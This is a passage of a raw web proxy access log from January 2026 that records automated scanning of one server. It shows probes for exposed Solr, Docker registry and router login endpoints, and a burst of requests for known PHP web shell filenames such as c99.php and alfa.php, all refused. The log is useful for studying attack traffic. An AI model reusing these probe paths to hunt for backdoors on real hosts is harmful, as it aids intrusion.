95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:55:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:06:15:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:06:22:07 +0000] 400 - GET http localhost "/" [Client 46.101.165.39] [Length 252] [Gzip -] "-" "-" +[12/Jan/2026:06:22:08 +0000] 400 - POST http 92.249.249.197 "/sdk" [Client 46.101.165.39] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:06:22:08 +0000] 400 - GET http 92.249.249.197 "/odinhttpcall1768198927" [Client 46.101.165.39] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:06:22:09 +0000] 400 - GET http 92.249.249.197 "/HNAP1" [Client 46.101.165.39] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:06:22:09 +0000] 400 - GET http 92.249.249.197 "/evox/about" [Client 46.101.165.39] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:06:22:11 +0000] 400 - GET http localhost "/" [Client 46.101.165.39] [Length 252] [Gzip -] "-" "-" +[12/Jan/2026:06:22:12 +0000] 400 - GET http 92.249.249.197 "/" [Client 46.101.165.39] [Length 252] [Gzip -] "-" "-" +[12/Jan/2026:06:22:12 +0000] 400 - GET http 92.249.249.197 "/v2/_catalog" [Client 164.90.216.252] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:06:22:12 +0000] 400 - GET http 92.249.249.197 "/solr/admin/info/system" [Client 64.226.100.159] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:06:22:12 +0000] 400 - GET http 92.249.249.197 "/query?q=SHOW+DIAGNOSTICS" [Client 164.92.233.170] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:06:22:12 +0000] 400 - GET http 92.249.249.197 "/" [Client 165.22.78.221] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:06:22:12 +0000] 400 - GET http 92.249.249.197 "/cgi-bin/authLogin.cgi" [Client 164.92.233.170] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:06:22:12 +0000] 400 - GET http 92.249.249.197 "/solr/admin/cores?action=STATUS&wt=json" [Client 64.226.100.159] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:06:37:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 167.94.138.51] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[12/Jan/2026:06:37:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.51] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:06:37:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.51] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:06:37:42 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[12/Jan/2026:06:38:42 +0000] 404 - GET http 92.249.249.197 "/robots.txt" [Client 91.232.238.106] [Length 150] [Gzip -] "xfa1" "-" +[12/Jan/2026:06:39:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:06:40:06 +0000] 404 - GET http 92.249.249.197 "/sitemap.xml" [Client 167.94.138.51] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[12/Jan/2026:06:40:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.51] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:06:48:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:06:49:44 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 38.242.213.246] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[12/Jan/2026:06:59:23 +0000] 200 - GET http 92.249.249.197 "/" [Client 162.216.150.127] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[12/Jan/2026:07:05:06 +0000] 404 - POST http 92.249.249.197 "/boaform/admin/formLogin" [Client 95.214.55.41] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://92.249.249.197:80/admin/login.asp" +[12/Jan/2026:07:05:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.41] [Length 0] [Gzip -] "-" "-" +[12/Jan/2026:07:06:35 +0000] 400 - GET http localhost "/" [Client 46.101.104.139] [Length 252] [Gzip -] "-" "-" +[12/Jan/2026:07:06:36 +0000] 400 - POST http 92.249.249.197 "/sdk" [Client 46.101.104.139] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:07:06:36 +0000] 400 - GET http 92.249.249.197 "/odinhttpcall1768201595" [Client 46.101.104.139] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:07:06:37 +0000] 400 - GET http 92.249.249.197 "/evox/about" [Client 46.101.104.139] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:07:06:37 +0000] 400 - GET http 92.249.249.197 "/HNAP1" [Client 46.101.104.139] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:07:06:38 +0000] 400 - GET http localhost "/" [Client 46.101.104.139] [Length 252] [Gzip -] "-" "-" +[12/Jan/2026:07:06:39 +0000] 400 - GET http 92.249.249.197 "/" [Client 46.101.104.139] [Length 252] [Gzip -] "-" "-" +[12/Jan/2026:07:06:39 +0000] 400 - GET http 92.249.249.197 "/query?q=SHOW+DIAGNOSTICS" [Client 164.92.234.5] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:07:06:39 +0000] 400 - GET http 92.249.249.197 "/solr/admin/info/system" [Client 104.248.143.76] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:07:06:39 +0000] 400 - GET http 92.249.249.197 "/v2/_catalog" [Client 134.209.224.40] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:07:06:39 +0000] 400 - GET http 92.249.249.197 "/cgi-bin/authLogin.cgi" [Client 46.101.108.210] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:07:06:39 +0000] 400 - GET http 92.249.249.197 "/" [Client 104.248.143.76] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[12/Jan/2026:07:06:39 +0000] 400 - GET http 92.249.249.197 "/solr/admin/cores?action=STATUS&wt=json" [Client 104.248.143.76] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[12/Jan/2026:07:11:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.75] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:07:15:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:07:23:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 71.6.232.22] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[12/Jan/2026:07:30:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:07:43:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 45.135.194.23] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:07:45:16 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:07:46:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 103.203.56.3] [Length 1033] [Gzip -] "HTTP Banner Detection (https://security.ipip.net)" "-" +[12/Jan/2026:07:47:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:07:55:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:07:58:28 +0000] 400 - GET http 92.249.249.197 "/" [Client 159.203.70.73] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[12/Jan/2026:07:58:28 +0000] 400 - GET http 92.249.249.197 "/t4" [Client 159.203.70.73] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[12/Jan/2026:07:58:29 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 159.203.70.73] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[12/Jan/2026:08:12:21 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:21 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/rymmm.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:21 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ws34.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:21 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ws45.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:22 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/xxw.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:22 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ws33.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:22 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/lm13.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:22 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ws38.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:22 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/xeqdlun.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:23 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ws37.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:23 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ws36.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:23 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/xinder.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:23 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/rendi59.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:23 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/test/lm.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:23 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/style2.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:24 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//alfa.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:24 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wpupex.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:24 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ava.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:24 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nks.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:24 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/languages/index.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:25 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/uploads/index.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:25 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ss.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:25 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/.well-known/content.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:25 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/sxo.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:25 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/themes/hideo/network.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:26 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cache/wp-post-data.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:26 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/uploads/Casper.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:26 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/new.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:26 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-admin/images/commentv.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:26 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/x/" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:27 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dom.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:27 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ooj.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:27 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-content/" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:27 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/BGA.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:27 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//sad/about.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:28 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nas.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:28 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/loi.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:28 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/lov.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:28 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/avaa.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:28 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nwwha.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:29 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//index/function.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:29 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//admin.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:29 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-includes/IXR/moon.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:29 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//shell20211028.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:29 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//skin/install/default/security.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:30 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/~norapump/hah.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:30 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-admin/class-db.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:30 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//buy.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:30 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/gib.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:30 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/des.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:31 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/plugins/achdxhv/languages/admin.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:31 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/hzz.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:31 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/rezor.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:31 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-admin/network/" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:32 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/oivcl.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:32 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-admin/install.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:32 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/db.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:32 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//autoload_classmap.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:32 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dropdown.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:33 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/images/c99.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:33 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//doc.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:33 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ps.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:33 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/about.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:33 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/output.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:34 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-xml.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:34 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/13.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:34 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-2019.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:34 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/classwithtostring.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:35 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/.trash7309/fafa/" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:35 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:35 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//lufix.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:35 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//elp.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:35 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wrt.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:36 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dr.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:36 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-includes/blocks/" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:36 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wtu.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:36 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/blog/byp.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:36 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/led.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:37 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/bhfnd.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:37 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//index/function.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:37 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/readme.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:37 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/aku.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:37 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/themes/about.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:38 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/x.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:38 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/fox.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:38 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/7f8c8.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:38 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/poj.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:38 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/zze.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:38 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:39 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/weozh.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:39 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/themes/about.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:39 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/zznmg.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:39 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/help/crnpwfiu.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:39 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/eru.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:40 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/index/zwso.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:40 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/images/2008.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:40 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//.cache/x.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:40 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu 